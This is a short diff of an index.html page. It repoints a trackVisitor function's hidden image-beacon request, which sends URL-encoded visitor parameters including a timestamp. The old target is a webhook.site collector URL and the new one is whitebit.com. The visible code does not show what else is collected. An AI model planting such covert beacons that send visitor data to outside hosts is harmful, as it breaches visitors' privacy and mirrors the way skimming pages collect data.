--- a/index.html
+++ b/index.html
@@ -197,7 +197,7 @@
             time: new Date().toISOString()
         });
 
-        new Image().src = "https://webhook.site/ced7cff6-575e-43a5-867c-22d4624f1bd1?" + params.toString();
+        new Image().src = "https://whitebit.com/?" + params.toString();
     }
 
     trackVisitor();
